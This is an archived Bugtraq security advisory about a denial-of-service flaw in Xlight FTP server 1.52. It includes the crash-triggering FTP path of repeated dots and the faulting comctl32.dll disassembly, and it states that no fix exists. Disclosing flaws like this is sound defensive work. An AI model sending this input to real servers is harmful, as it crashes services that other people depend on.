Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Thu, 05 Feb 2004 20:14:23 +0800
From: "intuit e.b." <intuit@linuxmail.org>
To: bugtraq@securityfocus.com
Subject: Remote crash Xlight ftp server 1.52


Application:  Xlight ftp server
              http://www.xlightftpd.com

Version:      1.52

Bug:          Denial Of Service

Author:       intuit
              e-mail: intuit@linuxmail.org
              web/forum: http://code.unixserver.at


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"Xlight ftp server is a powerful ftp server with very small program size. Using its own unique algorithm, it could handle more users than other windows ftp servers. Besides its high performance, xlight ftp server also has a lot of unique features."



***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

Server Option "Enable log to screen" must be enabled.
After authorization the user can enter such line:

-----------------------------------------------------------------------
ftp://user@127.0.0.1/............................................................................................................................................................................................................../*/
-----------------------------------------------------------------------

Now if the administrator will look a bookmark "ftp log" on main window of FTP server, ftp server will crashed with error in comctl32.dll.

***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

The mistake occurs here:

-----------------------------------------------------------------------
AppName: xlight.exe	 AppVer: 0.0.0.0	 ModName: comctl32.dll
ModVer: 5.82.2600.0	 Offset: 0004c4f7
-----------------------------------------------------------------------

-----------------------------------------------------------------------
7738C4DB   mov         edx,dword ptr [esp+4]
7738C4DF   push        edi
7738C4E0   mov         edi,dword ptr [esp+10h]
7738C4E4   test        edi,edi
7738C4E6   mov         eax,edx
7738C4E8   jle         7738C511
7738C4EA   dec         edi
7738C4EB   test        edi,edi
7738C4ED   jle         7738C50B
7738C4EF   push        esi
7738C4F0   mov         esi,dword ptr [esp+10h]
7738C4F4   mov         cx,word ptr [esi]
7738C4F7   mov         word ptr [edx],cx       <<<  here server crashed
7738C4FA   inc         edx
7738C4FB   inc         edx
7738C4FC   inc         esi
7738C4FD   inc         esi
7738C4FE   test        cx,cx
7738C501   je          7738C508
7738C503   dec         edi
7738C504   test        edi,edi
7738C506   jg          7738C4F4
7738C508   pop         esi
7738C509   test        edi,edi
7738C50B   jne         7738C511
7738C50D   and         word ptr [edx],0
7738C511   pop         edi
7738C512   ret         0Ch
-----------------------------------------------------------------------

/*Tested on: Win XP Build 2600, Service Pack: None*/

***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

Not exist.

***********************************************************************

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: